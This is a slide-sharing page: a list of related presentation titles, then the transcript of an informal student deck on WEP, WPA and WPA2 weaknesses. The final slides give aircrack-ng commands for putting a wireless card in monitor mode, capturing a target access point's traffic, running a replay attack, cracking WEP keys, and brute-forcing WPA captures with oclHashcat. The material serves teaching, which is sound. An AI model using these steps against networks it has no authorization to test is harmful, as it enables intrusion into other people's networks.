OSA vs WEP WPA and WPA II Tools for hacking

Slides:

Advertisements

Similar presentations

1 Practical stuff Crack the WPA key of this laptop. SSID: « Philips WiFi » Password list and cowpatty table available on CD (only useful today).

Advertisements

Crack WEP Lab Last Update Copyright 2014 Kenneth M. Chipps Ph.D.

Wireless Cracking By: Christopher Zacky.

IEEE i IT443 Broadband Communications Philip MacCabe October 5, 2005

CSE  Wired Equivalent Privacy (WEP) ◦ first security protocol defined in  Wi-Fi Protected Access (WPA) ◦ defined by Wi-Fi Alliance 

WLAN Security: Cracking WEP/WPA

Attack and Defense in Wireless Networks Presented by Aleksandr Doronin.

Wireless Security Ryan Hayles Jonathan Hawes. Introduction  WEP –Protocol Basics –Vulnerability –Attacks –Video  WPA –Overview –Key Hierarchy –Encryption/Decryption.

1 MD5 Cracking One way hash. Used in online passwords and file verification.

WiFi Security. What is WiFi ? Originally, Wi-Fi was a marketing term. The Wi-Fi certified logo means that the product has passed interoperability tests.

Wireless LAN Security Jerry Usery CS 522 December 6 th, 2006.

1 Enhancing Wireless Security with WPA CS-265 Project Section: 2 (11:30 – 12:20) Shefali Jariwala Student ID

W i reless LAN Security Presented by: Pallavi Priyadarshini Student ID

Wired Equivalent Privacy (WEP)

Vulnerability In Wi-Fi By Angus U CS 265 Section 2 Instructor: Mark Stamp.

Department of Computer Science Southern Illinois University Carbondale Wireless and Network Security Lecture 9: IEEE

15 November Wireless Security Issues Cheyenne Hollow Horn SFS Presentation 2004.

WIRELESS NETWORK SECURITY. Hackers Ad-hoc networks War Driving Man-in-the-Middle Caffe Latte attack.

WPA2 By Winway Pang. Overview  What is WPA2?  Wi-Fi Protected Access 2  Introduced September 2004  Two Versions  Enterprise – Server Authentication.

Wireless Security Issues David E. Hudak, Ph.D. Senior Software Architect Karlnet, Inc.

IWD2243 Wireless & Mobile Security Chapter 3 : Wireless LAN Security Prepared by : Zuraidy Adnan, FITM UNISEL1.

A Methodology for Evaluating Wireless Network Security Protocols David Rager Kandaraj Piamrat.

Wireless security & privacy Authors: M. Borsc and H. Shinde Source: IEEE International Conference on Personal Wireless Communications 2005 (ICPWC 2005),

A History of WEP The Ups and Downs of Wireless Security.

Wireless Security Beyond WEP. Wireless Security Privacy Authorization (access control) Data Integrity (checksum, anti-tampering)

Wireless Networking Concepts By: Forrest Finkler Computer Science 484 Networking Concepts.

1 C-DAC/Kolkata C-DAC All Rights Reserved Computer Security.

Done By : Ahmad Al-Asmar Wireless LAN Security Risks and Solutions.

WEP Protocol Weaknesses and Vulnerabilities

Wireless Network Hacking.  Authentication Techniques  1. Open System: no security techniques  2. Shared-Key: uses hashed string challenge with WEP.

Measuring of the time consumption of the WLAN’s security functions Jaroslav Kadlec, Radek Kuchta, Radimír Vrba Dept. of Microelectronics.

WLANs & Security Standards (802.11) b - up to 11 Mbps, several hundred feet g - up to 54 Mbps, backward compatible, same frequency a.

.  TJX used WEP security  They lost 45 million customer records  They settled the lawsuits for $40.9 million.

IEEE i Aniss Zakaria Survey Fall 2004 Friday, Dec 3, 2004

Wireless Security: The need for WPA and i By Abuzar Amini CS 265 Section 1.

Wireless Security Rick Anderson Pat Demko. Wireless Medium Open medium Broadcast in every direction Anyone within range can listen in No Privacy Weak.

KSU 2015-Summer Cyber Security | Group 1 | Seul Alice Bang Get a Wifi Password.

 Houses  In businesses  Local institutions  WEP – Wired Equivalent Privacy -Use of Initialization Vectors (IVs) -RC4 Traffic Key (creates keystreams)

Wireless Security John Himmelein Erick Andrew Christian Adam Varun Bapna.

Authentication has three means of authentication Verifies user has permission to access network 1.Open authentication : Each WLAN client can be.

802.11b Security CSEP 590 TU Osama Mazahir. Introduction Packets are sent out into the air for anyone to receive Eavesdropping is a much larger concern.

IEEE Security Specifically WEP, WPA, and WPA2 Brett Boge, Presenter CS 450/650 University of Nevada, Reno.

WPA Cracking with Rainbow Tables For Educational Purposes Only Kurt Wondra November 18 th, 2010  1) Scanning for Vulnerable Networks  2) Capturing Usable.

By Billy Ripple.  Security requirements  Authentication  Integrity  Privacy  Security concerns  Security techniques  WEP  WPA/WPA2  Conclusion.

EECS  Wired Equivalent Privacy (WEP) ◦ first security protocol defined in  Wi-Fi Protected Access (WPA) ◦ defined by Wi-Fi Alliance 

Tightening Wireless Networks By Andrew Cohen. Question Why more and more businesses aren’t converting their wired networks into wireless networks?

Understand Wireless Security LESSON Security Fundamentals.

Module 48 (Wireless Hacking)

CSE 4905 WiFi Security II WPA2 (WiFi Protected Access 2)

Advanced Penetration testing

Wireless Protocols WEP, WPA & WPA2.

Wireless Security.

Wireless Attacks: WEP Module Type: Basic Method Module Number: 0x00

Presented By: Rohit Maurya

We will talking about : What is WAP ? What is WAP2 ? Is there secure ?

WEP & WPA Mandy Kershishnik.

A Wireless LAN Security Protocol

Only For Education Purpose

Wireless LAN Security CSE 6590.

Wireless LAN Security 4.3 Wireless LAN Security.

Hacking Wi-Fi Beyond Script Kiddie and WEP

Advanced Penetration testing

IEEE i Dohwan Kim.

Wireless Network Security

CSE 4905 WiFi Security I WEP (Wired Equivalent Privacy)

Chapter 05 BẢO MẬT TRONG HỆ THỐNG WLAN

Symmetric-Key Encryption

Breaking into Wi-Fi Networks

Counter With Cipher Block Chaining-MAC

IT4833/6833 WiFi Security Building Blocks (I).

Presentation transcript:

OSA vs WEP WPA and WPA II Tools for hacking Wireless Security OSA vs WEP WPA and WPA II Tools for hacking

OSA vs SKA (1997) Open System Association | Shared Key Auth OSA: Complete Free-for-all – no auth at all SKA: Used WEP for Authentication Wireless Equivalent Protocol

WEP and why it sucks Streaming Algorithm RC4 – stream cipher in synchronous mode Need to keep sync at all times (wireless is bad at that) Per-packet master key re-use Every single packet sent holds the RC4 hash More exposure = more vulnerability Limited AP keys WEP only allows 1-4 secret keys so every AP on the network has to share them

WEP and why it sucks (cont.) No AP to client auth MITM attacks are easy Confidentiality Vulnerabilities in header Headers aren't verified by Integrity Checker Makes Redirection Attacks easy Integrity Checker is basically garbage No sequence numbers or timestamps Replay attacks are easy and effective

WPA (2003) Attempt to re-engineer WEP while using hardware already available Movements towards standardization 802.11i – group for increased security WiFi Alliance – standardization between vendors

Improvements on WEP WPA Improvements Integrity checker allowed for 56 bits (stronger keys) Passwords sent per session, not per packet Auth built on 802.1X framework and TKIP Packet sequence numbers (no replay attacks) Integrity checker for header and payload (no redirection attacks)

Improvements on WPA WPA2 (2004) Transition to AES instead of RC4 Way stronger in general Revamped Integrity Checking Leverage AES and better hardware CCMP (Counter Mode Cipher Block Chaining Message Authentication Code Protocol) (wtf) Basically encrypted encapsulation More secure key establishment and auth

Aircrack-ng Suite of tools for assessing WiFi network security ™ Monitoring (packet capturing and processing) Attacking (replay attacks, deauths, fake AP, etc) Testing Cracking (WEP and WPA PSK I+II)

Using it to break WEP iwconfig – check for wireless capabilities airmon-ng start wlan0 Set your wireless card to monitor mode airodump-ng mon0 Start monitoring for crazy stuff in the air Searching for AP's (John's iPhone) Airodump-ng –bssid “mac” -c “channel” -w WEPCrack mon0

Using it to break WEP Open a different terminal aireplay-ng -3 -b 'AP_mac' -h 'host_mac' mon0 Initiate a replay attack Looking for about 15k+ #Data aircrack-ng WEPcrack-01.cap Cracking Just wait for it and hope basically

Using it to crack WPA Basically the same method besides the last part WPA is strong enough that you have to bruteforce the pcap instead of doing analysis oclHashcat > Aircrack-ng because of rainbow tables and rule based cracking 5 minutes vs 2 hours